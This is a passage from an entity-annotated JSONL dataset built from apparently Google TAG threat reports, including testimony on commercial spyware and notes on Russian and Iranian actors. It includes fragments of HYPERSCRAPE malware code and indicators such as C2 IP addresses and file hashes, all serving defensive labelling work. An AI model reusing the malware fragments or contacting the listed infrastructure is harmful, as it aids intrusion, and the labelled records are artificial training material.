== null) { Thread.Sleep(1000); }","entities":[],"relations":[],"Comments":[]} -{"id":4687,"text":"jsonInfo.Data = this.OperationObject.GetUsername(); pipeCommunication.Write(jsonInfo); break; } }","entities":[],"relations":[],"Comments":[]} -{"id":4688,"text":"catch (Exception) { bool hasExited = process.HasExited; if (hasExited) { flag = true; } }","entities":[],"relations":[],"Comments":[]} -{"id":4689,"text":"pipeCommunication.Close(); }","entities":[],"relations":[],"Comments":[]} -{"id":4690,"text":"TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted.","entities":[{"id":50576,"label":"identity","start_offset":0,"end_offset":3},{"id":50577,"label":"threat-actor","start_offset":75,"end_offset":90}],"relations":[],"Comments":[]} -{"id":4691,"text":"It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement.","entities":[],"relations":[],"Comments":[]} -{"id":4692,"text":"We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry.","entities":[],"relations":[],"Comments":[]} -{"id":4693,"text":"We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services.","entities":[],"relations":[],"Comments":[]} -{"id":4694,"text":"In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.","entities":[],"relations":[],"Comments":[]} -{"id":4695,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50578,"label":"malware","start_offset":33,"end_offset":44},{"id":14210,"label":"IPV4","start_offset":4,"end_offset":18},{"id":14211,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} -{"id":4696,"text":"03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\EmailDownloader\\obj\\Debug\\EmailDownloader.pdb E:\\Working\\Projects\\EmailDownloader\\EmailDownloaderCookieMode\\Mahdi\\LiveLib\\obj\\Release\\LiveLib.pdb","entities":[{"id":50579,"label":"FILEPATH","start_offset":608,"end_offset":715},{"id":50580,"label":"FILEPATH","start_offset":716,"end_offset":815},{"id":14212,"label":"SHA2","start_offset":0,"end_offset":64},{"id":14216,"label":"SHA2","start_offset":260,"end_offset":324},{"id":14217,"label":"SHA2","start_offset":325,"end_offset":389},{"id":14218,"label":"SHA2","start_offset":390,"end_offset":454},{"id":14219,"label":"SHA2","start_offset":455,"end_offset":519},{"id":14220,"label":"identity","start_offset":520,"end_offset":529},{"id":14213,"label":"SHA2","start_offset":65,"end_offset":129},{"id":14214,"label":"SHA2","start_offset":130,"end_offset":194},{"id":14215,"label":"SHA2","start_offset":195,"end_offset":259},{"id":14221,"label":"SHA2","start_offset":539,"end_offset":603}],"relations":[],"Comments":[]} -{"id":4697,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50581,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} -{"id":4698,"text":"It was last updated on July 29, 2022.","entities":[{"id":50582,"label":"TIME","start_offset":23,"end_offset":36}],"relations":[],"Comments":[]} -{"id":4699,"text":" The following testimony was delivered to the U.S. House Intelligence Committee by Shane Huntley, Senior Director of Google’s Threat Analysis Group (TAG) on July 27, 2022. Chairman Schiff, Ranking Member Turner, and esteemed Members of the Committee: Thank you for the opportunity to appear before the Committee to discuss Google’s efforts to protect users from commercial spyware.","entities":[{"id":50584,"label":"identity","start_offset":83,"end_offset":96},{"id":50585,"label":"TIME","start_offset":157,"end_offset":170},{"id":50587,"label":"identity","start_offset":324,"end_offset":330},{"id":50583,"label":"identity","start_offset":46,"end_offset":79},{"id":50586,"label":"identity","start_offset":173,"end_offset":188},{"id":50588,"label":"identity","start_offset":98,"end_offset":153}],"relations":[],"Comments":[]} -{"id":4700,"text":"We appreciate the Committee’s efforts to raise awareness about the commercial spyware industry that is thriving and growing, creating risks to Americans and Internet users across the globe.","entities":[],"relations":[],"Comments":[]} -{"id":4701,"text":" Google has been tracking the activities of commercial spyware vendors for years, and we have been taking critical steps to protect our users.","entities":[{"id":50589,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4702,"text":"We take the security of our users very seriously, and we have dedicated teams in place to protect against attacks from a wide range of sources.","entities":[],"relations":[],"Comments":[]} -{"id":4703,"text":"Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.","entities":[{"id":50590,"label":"identity","start_offset":4,"end_offset":25},{"id":50591,"label":"identity","start_offset":30,"end_offset":33}],"relations":[],"Comments":[]} -{"id":4704,"text":"TAG actively monitors threat actors and the evolution of their tactics and techniques.","entities":[{"id":50592,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4705,"text":"For example, TAG has been closely tracking and disrupting campaigns targeting individuals and organizations in Ukraine, and frequently publishes reports on Russian threat actors.","entities":[{"id":50593,"label":"identity","start_offset":13,"end_offset":16},{"id":50594,"label":"location","start_offset":111,"end_offset":118},{"id":50595,"label":"location","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} -{"id":4706,"text":"We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.","entities":[],"relations":[],"Comments":[]} -{"id":4707,"text":"We also publicly release information about the operations we disrupt, which is available to our government partners and the general public.","entities":[],"relations":[],"Comments":[]} -{"id":4708,"text":"TAG tracks and proactively counters serious state-sponsored and financially motivated information cyber criminal activities, such as hacking and the use of spyware.","entities":[{"id":50596,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4709,"text":"And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.","entities":[],"relations":[],"Comments":[]} -{"id":4710,"text":"We are joined in this effort by many other security teams at Google, including Project Zero, our team of security researchers at Google who study zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world.","entities":[{"id":50597,"label":"identity","start_offset":61,"end_offset":67},{"id":50598,"label":"identity","start_offset":79,"end_offset":91},{"id":50599,"label":"identity","start_offset":129,"end_offset":135}],"relations":[],"Comments":[]} -{"id":4711,"text":" Google has a long track record combating commercial surveillance tools targeting our users.","entities":[{"id":50600,"label":"identity","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} -{"id":4712,"text":"In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.","entities":[{"id":50601,"label":"TIME","start_offset":3,"end_offset":7},{"id":50602,"label":"SOFTWARE","start_offset":9,"end_offset":16},{"id":50603,"label":"identity","start_offset":37,"end_offset":43},{"id":50604,"label":"threat-actor","start_offset":96,"end_offset":105},{"id":50605,"label":"malware","start_offset":108,"end_offset":115}],"relations":[],"Comments":[]} -{"id":4713,"text":"At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.","entities":[{"id":50607,"label":"malware","start_offset":102,"end_offset":109},{"id":50608,"label":"SOFTWARE","start_offset":166,"end_offset":173},{"id":50606,"label":"SOFTWARE","start_offset":17,"end_offset":24}],"relations":[],"Comments":[]} -{"id":4714,"text":"We observed fewer than three dozen installs of this spyware.","entities":[],"relations":[],"Comments":[]} -{"id":4715,"text":"We remediated the compromises for these users and implemented controls to protect all Android users.","entities":[{"id":50609,"label":"SOFTWARE","start_offset":86,"end_offset":93}],"relations":[],"Comments":[]} -{"id":4716,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50610,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} -{"id":4717,"text":"In 2019, we confronted the risks posed by NSO Group again, relying upon NSO Groups’s marketing information suggesting that they had a 0-day exploit for Android.","entities":[{"id":50611,"label":"TIME","start_offset":3,"end_offset":7},{"id":50612,"label":"threat-actor","start_offset":42,"end_offset":51},{"id":50614,"label":"SOFTWARE","start_offset":152,"end_offset":159},{"id":50613,"label":"threat-actor","start_offset":72,"end_offset":82},{"id":50615,"label":"attack-pattern","start_offset":134,"end_offset":147}],"relations":[],"Comments":[]} -{"id":4718,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50616,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4719,"text":"In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.","entities":[{"id":50617,"label":"TIME","start_offset":3,"end_offset":16},{"id":50618,"label":"threat-actor","start_offset":70,"end_offset":79},{"id":50619,"label":"SOFTWARE","start_offset":94,"end_offset":102}],"relations":[],"Comments":[]} -{"id":4720,"text":"iPhone users could be compromised by receiving a malicious iMessage text, without ever needing to click a malicious link.","entities":[{"id":50620,"label":"SOFTWARE","start_offset":59,"end_offset":67}],"relations":[],"Comments":[]} -{"id":4721,"text":"Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.","entities":[],"relations":[],"Comments":[]} -{"id":4722,"text":"Based on our research and findings, we assessed this to be one of the most technically sophisticated exploits we had ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.","entities":[{"id":50621,"label":"threat-actor","start_offset":172,"end_offset":175}],"relations":[],"Comments":[]} -{"id":4723,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50622,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} -{"id":4724,"text":"For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.","entities":[{"id":50623,"label":"threat-actor","start_offset":13,"end_offset":16},{"id":50624,"label":"location","start_offset":48,"end_offset":56},{"id":50625,"label":"attack-pattern","start_offset":78,"end_offset":102},{"id":50626,"label":"SOFTWARE","start_offset":106,"end_offset":112},{"id":50627,"label":"SOFTWARE","start_offset":117,"end_offset":134}],"relations":[],"Comments":[]} -{"id":4725,"text":"We assessed that a surveillance vendor packaged and sold these technologies.","entities":[],"relations":[],"Comments":[]} -{"id":4726,"text":"Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.","entities":[{"id":50628,"label":"identity","start_offset":13,"end_offset":23},{"id":50629,"label":"threat-actor","start_offset":48,"end_offset":55},{"id":50630,"label":"identity","start_offset":60,"end_offset":82}],"relations":[],"Comments":[]} -{"id":4727,"text":"Other reporting from Microsoft has linked this spyware to the compromise of dozens of victims, including political dissidents, human rights activists, journalists, and academics.","entities":[{"id":50631,"label":"identity","start_offset":21,"end_offset":30}],"relations":[],"Comments":[]} -{"id":4728,"text":"Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.","entities":[{"id":50632,"label":"SOFTWARE","start_offset":77,"end_offset":83},{"id":50633,"label":"SOFTWARE","start_offset":88,"end_offset":95},{"id":50634,"label":"SOFTWARE","start_offset":126,"end_offset":133},{"id":50635,"label":"vulnerability","start_offset":37,"end_offset":66}],"relations":[{"id":983,"from_id":50632,"to_id":50635,"type":"has"},{"id":984,"from_id":50633,"to_id":50635,"type":"has"},{"id":985,"from_id":50634,"to_id":50635,"type":"has"}],"Comments":[]} -{"id":4729,"text":"We assess with high confidence that commercial surveillance company Cytrox packaged these vulnerabilities, and sold the hacking software to at least eight governments.","entities":[{"id":50636,"label":"identity","start_offset":68,"end_offset":74}],"relations":[],"Comments":[]} -{"id":4730,"text":"Among other targets, this spyware was used to compromise journalists and opposition politicians.","entities":[],"relations":[],"Comments":[]} -{"id":4731,"text":"Our reporting is consistent with earlier analysis produced by CitizenLab and Meta.","entities":[{"id":50637,"label":"identity","start_offset":62,"end_offset":72},{"id":50638,"label":"identity","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} -{"id":4732,"text":"TAG also recently released information on a segment of attackers we call “hack-for-hire” that focuses on compromising accounts and exfiltrating data as a service.","entities":[{"id":50640,"label":"attack-pattern","start_offset":74,"end_offset":87},{"id":50641,"label":"attack-pattern","start_offset":131,"end_offset":161},{"id":50639,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4733,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50642,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} -{"id":4734,"text":"They target a wide range of users and opportunistically take advantage of known security flaws when undertaking their campaigns.","entities":[],"relations":[],"Comments":[]} -{"id":4735,"text":"In June, we provided examples of the hack-for-hire ecosystem from India, Russia, and the United Arab Emirates.","entities":[{"id":50647,"label":"location","start_offset":89,"end_offset":109},{"id":50643,"label":"TIME","start_offset":3,"end_offset":7},{"id":50644,"label":"attack-pattern","start_offset":37,"end_offset":50},{"id":50645,"label":"location","start_offset":66,"end_offset":71},{"id":50646,"label":"location","start_offset":73,"end_offset":79}],"relations":[],"Comments":[]} -{"id":4736,"text":"The growth of commercial spyware vendors and hack-for-hire groups has necessitated growth in TAG to counter these threats.","entities":[{"id":50648,"label":"identity","start_offset":93,"end_offset":96}],"relations":[],"Comments":[]} -{"id":4737,"text":"Where once we only needed substreams to focus on threat actors such as China, Russia, and North Korea, TAG now has a dedicated analysis subteam dedicated to commercial vendors and operators.","entities":[{"id":50649,"label":"location","start_offset":71,"end_offset":76},{"id":50650,"label":"location","start_offset":78,"end_offset":84},{"id":50651,"label":"location","start_offset":90,"end_offset":101},{"id":50652,"label":"identity","start_offset":103,"end_offset":106}],"relations":[],"Comments":[]} -{"id":4738,"text":" Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments.","entities":[],"relations":[],"Comments":[]} -{"id":4739,"text":"These vendors operate with deep technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4740,"text":"We believe its use is growing, fueled by demand from governments.","entities":[],"relations":[],"Comments":[]} -{"id":4741,"text":"Seven of the nine zero-day vulnerabilities our Threat Analysis Group discovered in 2021 were originally developed by commercial providers and sold to and used by state-sponsored actors.","entities":[{"id":50653,"label":"identity","start_offset":47,"end_offset":68},{"id":50654,"label":"TIME","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} -{"id":4742,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to state-sponsored actors.","entities":[{"id":50655,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4743,"text":"This industry appears to be thriving.","entities":[],"relations":[],"Comments":[]} -{"id":4746,"text":"These vendors are enabling the proliferation of dangerous hacking tools, arming nation state actors that would not otherwise be able to develop these capabilities in-house.","entities":[],"relations":[],"Comments":[]} -{"id":4747,"text":"While use of surveillance technologies may be legal under national or international laws, they are found to be used by some state actors for purposes antithetical to democratic values: targeting dissidents, journalists, human rights workers, and opposition party politicians.","entities":[],"relations":[],"Comments":[]} -{"id":4748,"text":"We have also observed proliferation risk from nation state actors attempting to gain access to the exploits of these vendors.","entities":[],"relations":[],"Comments":[]} -{"id":4749,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50658,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} -{"id":4751,"text":"In addition to these concerns, there are other reasons why this industry presents a risk more broadly across the Internet.","entities":[],"relations":[],"Comments":[]} -{"id":4752,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret can pose a severe risk to the Internet when the vendor itself gets compromised.","entities":[],"relations":[],"Comments":[]} -{"id":4753,"text":"This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.","entities":[],"relations":[],"Comments":[]} -{"id":4754,"text":"The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.","entities":[],"relations":[],"Comments":[]} -{"id":4755,"text":"This is why when Google discovers these activities, we not only take steps to protect users, but also disclose that information publicly to raise awareness and help the entire ecosystem, in line with our historical commitment to openness and democratic values.","entities":[{"id":50660,"label":"identity","start_offset":17,"end_offset":23}],"relations":[],"Comments":[]} -{"id":4756,"text":"Across all Google products, we incorporate industry-leading security features and protections to keep our users safe.","entities":[{"id":50661,"label":"identity","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4757,"text":"On Search, Google’s Safe Browsing is an industry-leading service to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50662,"label":"SOFTWARE","start_offset":11,"end_offset":33}],"relations":[],"Comments":[]} -{"id":4758,"text":"Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.","entities":[{"id":50663,"label":"SOFTWARE","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} -{"id":4759,"text":"Safe Browsing also notifies webmasters when their websites are compromised by malicious actors and helps them diagnose and resolve the problem so that their visitors stay safer.","entities":[{"id":50664,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":4760,"text":"On Gmail, we recommend certain Gmail security precautions to prevent spoofing, phishing, and spam.","entities":[{"id":50667,"label":"attack-pattern","start_offset":69,"end_offset":77},{"id":50665,"label":"SOFTWARE","start_offset":3,"end_offset":8},{"id":50666,"label":"SOFTWARE","start_offset":31,"end_offset":36},{"id":50668,"label":"attack-pattern","start_offset":79,"end_offset":87},{"id":50669,"label":"attack-pattern","start_offset":93,"end_offset":97}],"relations":[],"Comments":[]} -{"id":4761,"text":"Spoofers may send forged messages using an organization’s real name or domain to subvert authentication measures.","entities":[],"relations":[],"Comments":[]} -{"id":4762,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[],"relations":[],"Comments":[]} -{"id":4763,"text":"And we offer other advanced phishing and malware protection to administrators to better protect their users.","entities":[],"relations":[],"Comments":[]} -{"id":4764,"text":"By default, Gmail displays warnings and moves untrustworthy emails to the user’s spam folder.","entities":[{"id":50670,"label":"SOFTWARE","start_offset":12,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4765,"text":"However administrators can also use advanced security settings to enhance their users’ protection against suspicious attachments and scripts from untrusted senders.","entities":[],"relations":[],"Comments":[]} -{"id":4766,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50671,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4767,"text":"The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.","entities":[{"id":50672,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} -{"id":4768,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} -{"id":4769,"text":"During the development stage, Android-created and open source components are subject to vigorous security reviews","entities":[{"id":50673,"label":"SOFTWARE","start_offset":30,"end_offset":37}],"relations":[],"Comments":[]} -{"id":4770,"text":"For users, Android provides safety and control over how apps and third parties can access the data from their devices.","entities":[{"id":50674,"label":"SOFTWARE","start_offset":11,"end_offset":18}],"relations":[],"Comments":[]} -{"id":4771,"text":"For example, users are provided visibility into the permissions requested by each app, and they are able to control those permissions.","entities":[],"relations":[],"Comments":[]} -{"id":4772,"text":"We have also built additional tools to prevent successful attacks on devices that run Android once those devices are in users’ hands.","entities":[],"relations":[],"Comments":[]} -{"id":4773,"text":"For example, Google Play Protect, our built-in malware protection for Android, continuously scans devices for potentially harmful applications.","entities":[{"id":50675,"label":"SOFTWARE","start_offset":13,"end_offset":32},{"id":50676,"label":"SOFTWARE","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} -{"id":4774,"text":"Although our security precautions are robust, security issues can still occur, which is why we created a comprehensive security response process to respond to incidents.","entities":[],"relations":[],"Comments":[]} -{"id":4775,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50677,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4776,"text":"We also provide research grants to security researchers to help fund and support the research community.","entities":[],"relations":[],"Comments":[]} -{"id":4777,"text":"This is all part of a larger strategy to keep Google products and users, as well as the Internet at large more secure.","entities":[{"id":50678,"label":"identity","start_offset":46,"end_offset":52}],"relations":[],"Comments":[]} -{"id":4778,"text":"Project Zero is also a critical component of this strategy, pushing transparency and more timely patching of vulnerabilities.","entities":[{"id":50679,"label":"identity","start_offset":0,"end_offset":12}],"relations":[],"Comments":[]} -{"id":4779,"text":"Finally, we also offer the leading tools to protect important civil society actors such as journalists, human rights workers, opposition party politicians, and campaign organizations – in other words, the users who are frequently targeted by surveillance tools.","entities":[],"relations":[],"Comments":[]} -{"id":4780,"text":"Google developed Project Shield, a free protection against distributed denial of service (DDoS) attacks, to protect news media and human rights organization websites.","entities":[{"id":50680,"label":"identity","start_offset":0,"end_offset":6},{"id":50681,"label":"attack-pattern","start_offset":59,"end_offset":95}],"relations":[],"Comments":[]} -{"id":4782,"text":"To protect high risk user accounts, we offer the Advanced Protection Program (APP), which is our highest form of account security.","entities":[],"relations":[],"Comments":[]} -{"id":4783,"text":"APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.","entities":[{"id":50685,"label":"attack-pattern","start_offset":116,"end_offset":147}],"relations":[],"Comments":[]} -{"id":4784,"text":" We believe it is time for government, industry and civil society to come together to change the incentive structure which has allowed these technologies to spread in secret.","entities":[],"relations":[],"Comments":[]} -{"id":4785,"text":"The first step is to understand the scope of the problem.","entities":[],"relations":[],"Comments":[]} -{"id":4786,"text":"We appreciate the Committee’s focus on this issue, and recommend the U.S. Intelligence Community prioritize identifying and analyzing threats from foreign commercial spyware providers as being on par with other major advanced threat actors.","entities":[{"id":50686,"label":"identity","start_offset":69,"end_offset":96}],"relations":[],"Comments":[]} -{"id":4787,"text":"The U.S. should also consider ways to foster greater transparency in the marketplace, including setting heightened transparency requirements for the domestic surveillance industry.","entities":[{"id":50687,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} -{"id":4788,"text":"The U.S. could also set an example to other governments by reviewing and disclosing its own historical use of these tools.","entities":[{"id":50688,"label":"identity","start_offset":4,"end_offset":8}],"relations":[],"Comments":[]} -{"id":4789,"text":"We welcome recent steps taken by the government in applying sanctions to the NSO Group and Candiru, and we believe other governments should consider expanding these restrictions.","entities":[{"id":50689,"label":"threat-actor","start_offset":77,"end_offset":86},{"id":50690,"label":"threat-actor","start_offset":91,"end_offset":98}],"relations":[],"Comments":[]} -{"id":4790,"text":"Additionally, the U.S. government should consider a full ban on Federal procurement of commercial spyware technologies and contemplate imposing further sanctions to limit spyware vendors’ ability to operate in the U.S. and receive U.S. investment.","entities":[{"id":50692,"label":"identity","start_offset":214,"end_offset":218},{"id":50693,"label":"identity","start_offset":231,"end_offset":235},{"id":50691,"label":"identity","start_offset":18,"end_offset":33}],"relations":[],"Comments":[]} -{"id":4791,"text":"The harms from this industry are amply evident by this point, and we believe they outweigh any benefit to continued use.","entities":[],"relations":[],"Comments":[]} -{"id":4792,"text":"Finally, we urge the United States to lead a diplomatic effort to work with the governments of the countries who harbor problematic vendors, as well as those who employ these tools, to build support for measures that limit harms caused by this industry.","entities":[{"id":50694,"label":"identity","start_offset":21,"end_offset":34}],"relations":[],"Comments":[]} -{"id":4793,"text":"Any one government’s ability to meaningfully impact this market is limited; only through a concerted international effort can this serious risk to online safety be mitigated.","entities":[],"relations":[],"Comments":[]} -{"id":4794,"text":"Google is investing heavily as a company and as an industry to counter serious threats to our users.","entities":[{"id":50695,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4795,"text":"In the modern world, we must be able to trust the devices we use every day and ensure that foreign adversaries do not have access to sophisticated exploits.","entities":[],"relations":[],"Comments":[]} -{"id":4796,"text":"While we continue to fight these threats on a technical level, the providers of these capabilities operate openly in democratic countries.","entities":[],"relations":[],"Comments":[]} -{"id":4797,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50696,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} -{"id":4798,"text":"I thank the Committee for this attention on this critical issue.","entities":[],"relations":[],"Comments":[]} -{"id":4799,"text":"Google’s Threat Analysis Group (TAG) continues to closely monitor the cybersecurity environment in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":50699,"label":"location","start_offset":140,"end_offset":147},{"id":50697,"label":"identity","start_offset":0,"end_offset":36},{"id":50698,"label":"identity","start_offset":99,"end_offset":113}],"relations":[],"Comments":[]} -{"id":4800,"text":"Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.","entities":[{"id":50702,"label":"location","start_offset":62,"end_offset":69},{"id":50703,"label":"threat-actor","start_offset":121,"end_offset":132},{"id":50704,"label":"location","start_offset":153,"end_offset":160},{"id":50701,"label":"threat-actor","start_offset":5,"end_offset":36}],"relations":[{"id":986,"from_id":50701,"to_id":50702,"type":"targets"}],"Comments":[]} -{"id":4801,"text":"TAG continues to disrupt campaigns from multiple sets of Russian government-backed attackers, some of which are detailed in our previous updates.","entities":[{"id":50705,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} -{"id":4802,"text":"Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.","entities":[{"id":50710,"label":"threat-actor","start_offset":179,"end_offset":203},{"id":50707,"label":"identity","start_offset":94,"end_offset":97},{"id":50709,"label":"attack-pattern","start_offset":28,"end_offset":42},{"id":50711,"label":"threat-actor","start_offset":210,"end_offset":233},{"id":50706,"label":"location","start_offset":82,"end_offset":89},{"id":50708,"label":"location","start_offset":11,"end_offset":18},{"id":50712,"label":"identity","start_offset":253,"end_offset":256}],"relations":[{"id":987,"from_id":50710,"to_id":50709,"type":"uses"},{"id":988,"from_id":50711,"to_id":50709,"type":"uses"},{"id":989,"from_id":50710,"to_id":50708,"type":"located-at"},{"id":990,"from_id":50711,"to_id":50708,"type":"located-at"},{"id":991,"from_id":50710,"to_id":50706,"type":"targets"},{"id":992,"from_id":50711,"to_id":50706,"type":"targets"}],"Comments":[]} -{"id":4804,"text":"Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.","entities":[{"id":50714,"label":"identity","start_offset":48,"end_offset":51},{"id":50715,"label":"threat-actor","start_offset":88,"end_offset":93},{"id":50719,"label":"SOFTWARE","start_offset":183,"end_offset":190},{"id":50716,"label":"location","start_offset":126,"end_offset":132},{"id":50717,"label":"identity","start_offset":135,"end_offset":165},{"id":50718,"label":"identity","start_offset":221,"end_offset":244}],"relations":[{"id":994,"from_id":50717,"to_id":50716,"type":"located-at"},{"id":995,"from_id":50715,"to_id":50717,"type":"attributed-to"},{"id":996,"from_id":50715,"to_id":50718,"type":"impersonates"},{"id":997,"from_id":50715,"to_id":50719,"type":"uses"}],"Comments":[]} -{"id":4805,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[{"id":50720,"label":"threat-actor","start_offset":36,"end_offset":41},{"id":50721,"label":"SOFTWARE","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} -{"id":4806,"text":"The apps were not distributed through the Google Play Store, but hosted on a domain controlled by the actor and disseminated via links on third party messaging services.","entities":[{"id":50722,"label":"SOFTWARE","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} -{"id":4807,"text":"We believe there was no major impact on Android users and that the number of installs was miniscule.","entities":[{"id":50723,"label":"SOFTWARE","start_offset":40,"end_offset":47}],"relations":[],"Comments":[]} -{"id":4808,"text":"The app is distributed under the guise of performing Denial of Service (DoS) attacks against a set of Russian websites.","entities":[{"id":50724,"label":"attack-pattern","start_offset":53,"end_offset":84}],"relations":[],"Comments":[]} -{"id":4809,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50725,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} -{"id":4810,"text":"The list of target websites for the app can be seen in the CyberChef recipe here.","entities":[{"id":50726,"label":"tools","start_offset":59,"end_offset":68}],"relations":[],"Comments":[]} -{"id":4811,"text":"During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.","entities":[{"id":50729,"label":"SOFTWARE","start_offset":78,"end_offset":89},{"id":50730,"label":"TIME","start_offset":116,"end_offset":126},{"id":50731,"label":"attack-pattern","start_offset":156,"end_offset":159},{"id":50727,"label":"threat-actor","start_offset":34,"end_offset":39},{"id":50728,"label":"malware","start_offset":40,"end_offset":49}],"relations":[{"id":998,"from_id":50727,"to_id":50728,"type":"uses"}],"Comments":[]} -{"id":4812,"text":"In this case, the Android app name was stopwar.apk (com.ddos.stopwar) and was distributed from the website 